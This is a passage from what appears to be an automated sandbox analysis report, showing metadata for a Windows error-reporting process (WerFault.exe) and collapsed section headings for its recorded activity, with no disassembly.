                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5956 -s 5144
                                                                                                                                                                                          Imagebase:0x7ff76ccc0000
                                                                                                                                                                                          File size:628'208 bytes
                                                                                                                                                                                          MD5 hash:5A849C27C4796C1A7C22C572D8EAF95D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Section Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Mutex Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Process Activities

                                                                                                                                                                                          Thread Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          System Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          No disassembly